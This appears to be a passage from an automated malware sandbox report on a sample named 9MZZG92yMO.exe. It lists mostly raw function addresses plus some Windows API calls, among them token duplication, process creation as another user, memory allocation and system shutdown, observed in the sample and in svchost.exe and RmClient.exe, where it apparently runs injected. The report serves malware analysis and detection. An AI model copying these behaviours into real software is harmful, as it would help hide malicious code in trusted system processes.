                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02DB0 NtEnumerateKey,6_2_02D02DB0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D02D00 NtSetInformationFile,6_2_02D02D00
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D03090 NtSetValueKey,6_2_02D03090
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D03010 NtOpenDirectoryObject,6_2_02D03010
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D03D70 NtOpenThread,6_2_02D03D70
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D03D10 NtOpenProcessToken,6_2_02D03D10
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001D8BE0 NtCreateFile,6_2_001D8BE0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001D8D40 NtReadFile,6_2_001D8D40
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001D8E30 NtDeleteFile,6_2_001D8E30
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001D8ED0 NtClose,6_2_001D8ED0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001D9020 NtAllocateVirtualMemory,6_2_001D9020
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0052A1EF
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00518310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00518310
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_005251BD
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004CE6A00_2_004CE6A0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004ED9750_2_004ED975
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004CFCE00_2_004CFCE0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E21C50_2_004E21C5
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F62D20_2_004F62D2
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005403DA0_2_005403DA
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F242E0_2_004F242E
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E25FA0_2_004E25FA
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0051E6160_2_0051E616
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004D66E10_2_004D66E1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F878F0_2_004F878F
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005408570_2_00540857
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F68440_2_004F6844
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004D88080_2_004D8808
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_005288890_2_00528889
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004ECB210_2_004ECB21
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F6DB60_2_004F6DB6
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004D6F9E0_2_004D6F9E
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004D30300_2_004D3030
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004EF1D90_2_004EF1D9
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E31870_2_004E3187
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C12870_2_004C1287
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E14840_2_004E1484
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004D55200_2_004D5520
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E76960_2_004E7696
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004D57600_2_004D5760
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E19780_2_004E1978
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F9AB50_2_004F9AB5
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00547DDB0_2_00547DDB
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004E1D900_2_004E1D90
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004EBDA60_2_004EBDA6
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004CDF000_2_004CDF00
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004D3FE00_2_004D3FE0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_011094800_2_01109480
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004180C32_2_004180C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9532_2_0040F953
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011B02_2_004011B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162CF2_2_004162CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162D32_2_004162D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022AC2_2_004022AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022B02_2_004022B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004043672_2_00404367
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FB732_2_0040FB73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB792_2_0040DB79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB832_2_0040DB83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C202_2_00401C20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DCCC2_2_0040DCCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DCD32_2_0040DCD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DD9D2_2_0040DD9D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E6532_2_0042E653
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026D02_2_004026D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F302_2_00402F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C02C02_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F41A22_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C81582_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D20002_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E44202_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BEFA02_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E2F302_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DCD1F2_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038856302_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039095C32_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B5BF02_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E1AA32_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D59102_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD22_2_03803FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD52_2_03803FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D502C06_2_02D502C0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D702746_2_02D70274
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CDE3F06_2_02CDE3F0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D903E66_2_02D903E6
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8A3526_2_02D8A352
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D620006_2_02D62000
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D881CC6_2_02D881CC
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D901AA6_2_02D901AA
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D841A26_2_02D841A2
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D581586_2_02D58158
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CC01006_2_02CC0100
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D6A1186_2_02D6A118
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CEC6E06_2_02CEC6E0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CCC7C06_2_02CCC7C0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CF47506_2_02CF4750
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD07706_2_02CD0770
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D7E4F66_2_02D7E4F6
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D824466_2_02D82446
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D744206_2_02D74420
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D905916_2_02D90591
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD05356_2_02CD0535
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CCEA806_2_02CCEA80
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D86BD76_2_02D86BD7
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8AB406_2_02D8AB40
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CFE8F06_2_02CFE8F0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CB68B86_2_02CB68B8
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD28406_2_02CD2840
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CDA8406_2_02CDA840
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD29A06_2_02CD29A0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D9A9A66_2_02D9A9A6
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CE69626_2_02CE6962
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8EEDB6_2_02D8EEDB
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8CE936_2_02D8CE93
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CE2E906_2_02CE2E90
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD0E596_2_02CD0E59
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8EE266_2_02D8EE26
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CC2FC86_2_02CC2FC8
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CDCFE06_2_02CDCFE0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D4EFA06_2_02D4EFA0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D44F406_2_02D44F40
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D72F306_2_02D72F30
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D12F286_2_02D12F28
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CF0F306_2_02CF0F30
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CC0CF26_2_02CC0CF2
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D70CB56_2_02D70CB5
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD0C006_2_02CD0C00
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CCADE06_2_02CCADE0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CE8DBF6_2_02CE8DBF
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D6CD1F6_2_02D6CD1F
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CDAD006_2_02CDAD00
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CEB2C06_2_02CEB2C0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D712ED6_2_02D712ED
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD52A06_2_02CD52A0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D1739A6_2_02D1739A
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CBD34C6_2_02CBD34C
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8132D6_2_02D8132D
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD70C06_2_02CD70C0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D7F0CC6_2_02D7F0CC
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D870E96_2_02D870E9
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8F0E06_2_02D8F0E0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CDB1B06_2_02CDB1B0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D9B16B6_2_02D9B16B
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CBF1726_2_02CBF172
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D0516C6_2_02D0516C
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D816CC6_2_02D816CC
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D156306_2_02D15630
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8F7B06_2_02D8F7B0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CC14606_2_02CC1460
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8F43F6_2_02D8F43F
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D995C36_2_02D995C3
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D6D5B06_2_02D6D5B0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D875716_2_02D87571
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D7DAC66_2_02D7DAC6
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D15AA06_2_02D15AA0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D71AA36_2_02D71AA3
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D6DAAC6_2_02D6DAAC
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FA496_2_02D8FA49
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D87A466_2_02D87A46
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D43A6C6_2_02D43A6C
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D45BF06_2_02D45BF0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D0DBF96_2_02D0DBF9
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CEFB806_2_02CEFB80
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FB766_2_02D8FB76
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD38E06_2_02CD38E0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D3D8006_2_02D3D800
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD99506_2_02CD9950
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CEB9506_2_02CEB950
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D659106_2_02D65910
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD9EB06_2_02CD9EB0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD1F926_2_02CD1F92
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FFB16_2_02D8FFB1
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FF096_2_02D8FF09
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D8FCF26_2_02D8FCF2
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D49C326_2_02D49C32
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CEFDC06_2_02CEFDC0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D81D5A6_2_02D81D5A
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02CD3D406_2_02CD3D40
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02D87D736_2_02D87D73
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C18806_2_001C1880
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BC7A06_2_001BC7A0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BA9D06_2_001BA9D0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BC9C06_2_001BC9C0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BA9C66_2_001BA9C6
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BAB196_2_001BAB19
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BAB206_2_001BAB20
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001BABEA6_2_001BABEA
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C4F106_2_001C4F10
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C311C6_2_001C311C
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001C31206_2_001C3120
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001B11B46_2_001B11B4
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_001DB4A06_2_001DB4A0
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A453A16_2_02A453A1
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3E3876_2_02A3E387
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A4538D6_2_02A4538D
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3D7E86_2_02A3D7E8
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3E71D6_2_02A3E71D
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02A3CA886_2_02A3CA88
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: String function: 004E0AE3 appears 48 times
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: String function: 004C7DE1 appears 36 times
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: String function: 004E8900 appears 42 times
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02D3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02D05130 appears 58 times
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02D17E54 appears 111 times
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02D4F290 appears 105 times
                Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02CBB970 appears 280 times
                Source: 9MZZG92yMO.exe, 00000000.00000003.2173878169.0000000003BAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 9MZZG92yMO.exe
                Source: 9MZZG92yMO.exe, 00000000.00000003.2175066463.0000000003A03000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 9MZZG92yMO.exe
